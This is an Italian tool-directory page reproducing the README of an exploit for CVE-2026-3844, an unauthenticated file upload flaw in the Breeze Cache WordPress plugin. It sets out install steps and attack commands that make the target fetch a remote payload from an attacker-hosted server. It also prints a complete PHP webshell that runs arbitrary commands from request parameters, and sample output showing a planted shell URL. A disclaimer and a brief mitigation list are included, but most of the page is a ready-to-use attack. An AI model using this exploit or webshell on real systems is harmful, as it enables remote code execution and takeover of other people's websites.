Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - Caricamento Arbitrario di File Non Autenticato | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - Caricamento Arbitrario di File Non Autenticato

Vedi Repository
114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - Caricamento Arbitrario di File Non Autenticato

MIT License Python 3.6+ WordPress


⚠️ Disclaimer

root@kitploit:~
QUESTO STRUMENTO È FORNITO SOLO PER SCOPI EDUCATIVI E DI RICERCA SULLA SICUREZZA.
L'accesso non autorizzato a sistemi informatici è illegale. Utilizza questo strumento solo su
sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare. L'autore non si
assume alcuna responsabilità per usi impropri o danni causati da questo software.

📋 Descrizione

CVE-2026-3844 è una vulnerabilità critica di caricamento arbitrario di file non autenticato nel plugin Breeze Cache per WordPress (versioni ≤ 2.4.4). Il plugin non riesce a validare correttamente il parametro srcset nei commenti, consentendo ad attaccanti remoti di caricare file dannosi (inclusi webshell) sul server.

🔴 Gravità

  • Punteggio CVSS: 9.8 (Critico)
  • Vettore di Attacco: Rete
  • Autenticazione Richiesta: No
  • Impatto: Esecuzione Remota di Codice (RCE)

🎯 Versioni Interessate

  • Breeze Cache ≤ 2.4.4
  • WordPress tutte le versioni (dipende dal plugin)

🔧 Dettagli Tecnici

La vulnerabilità sfrutta la funzionalità di caching Gravatar in Breeze. Quando viene pubblicato un commento con un parametro srcset appositamente modificato contenente un URL di file remoto, Breeze scarica e memorizza il file localmente in:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[marcatore_casuale][estensione_file]

Prerequisito: L'opzione "Host Files Locally - Gravatars" deve essere abilitata nelle impostazioni di Breeze.

🚀 Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# Installa le dipendenze
pip install pycurl termcolor

💻 Utilizzo

Utilizzo Base

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

Opzioni Avanzate

root@kitploit:~
# Verifica se il target è vulnerabile senza sfruttamento
python3 CVE-2026-3844.py -u http://target.com --check-only

# Utilizza un URL payload personalizzato
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# Salva l'output in un file
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# Aumenta il timeout per target lenti
python3 CVE-2026-3844.py -u http://target.com --timeout 30

Argomenti della Riga di Comando

ArgomentoDescrizione
-u, --urlURL del target (obbligatorio)
-p, --payloadURL del payload remoto
--timeoutTimeout della richiesta in secondi (predefinito: 15)
--check-onlyVerifica solo se il target è vulnerabile
-o, --outputSalva l'URL della shell in un file

📝 Esempio di Payload Personalizzato

Crea il tuo webshell (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Ospitalo in un luogo accessibile, poi utilizza:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 Stringa di Verifica

L'exploit controlla automaticamente la stringa di verifica 4356452d323032362d33383434 (codifica esadecimale di "CVE-2026-3844") nel file caricato per confermare lo sfruttamento riuscito.

🛡️ Mitigazione

  1. Aggiorna Breeze Cache alla versione 2.4.5 o superiore
  2. Disabilita "Host Files Locally - Gravatars" se non necessario
  3. Implementa regole Web Application Firewall (WAF)
  4. Controlla regolarmente la funzionalità dei commenti

📸 Screenshot

root@kitploit:~
[*] FASE 1: VALUTAZIONE DELLA VULNERABILITÀ
[*] Verifica della versione del plugin Breeze...
[+] Target VULNERABILE (Breeze v2.4.4)

[*] FASE 2: SFRUTTAMENTO
[!] REQUISITO: 'Host Files Locally - Gravatars' DEVE ESSERE ABILITATO
[*] Passo 1: Invio del commento dannoso...
[+] Commento pubblicato con successo
[*] Passo 2: Attesa che Breeze memorizzi il file nella cache...
[*] Passo 3: Verifica del file caricato...
[+] File trovato in: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] STRINGA DI VERIFICA TROVATA - SFRUTTAMENTO RIUSCITO!

[✓] STATO: SUCCESSO
[✓] URL WEBSHELL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 Struttura delle Directory

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Script exploit principale
├── README.md            # Questo file
└── LICENSE              # Licenza MIT

📄 Licenza

Questo progetto è concesso in licenza sotto la Licenza MIT - consulta il file LICENSE per i dettagli.

🙏 Crediti

  • Autore: 0xgh057r3c0n
  • Scoperta: Team di ricerca sulla sicurezza
  • ID CVE: CVE-2026-3844

📞 Contatti

  • GitHub: @0xgh057r3c0n
  • Segnala problemi: GitHub Issues

⭐ Supporto

Se trovi utile questo strumento, per favore lascia una stella ⭐ su GitHub!


Realizzato con 🐍 Python | Solo per scopi educativi
Scarica lo strumento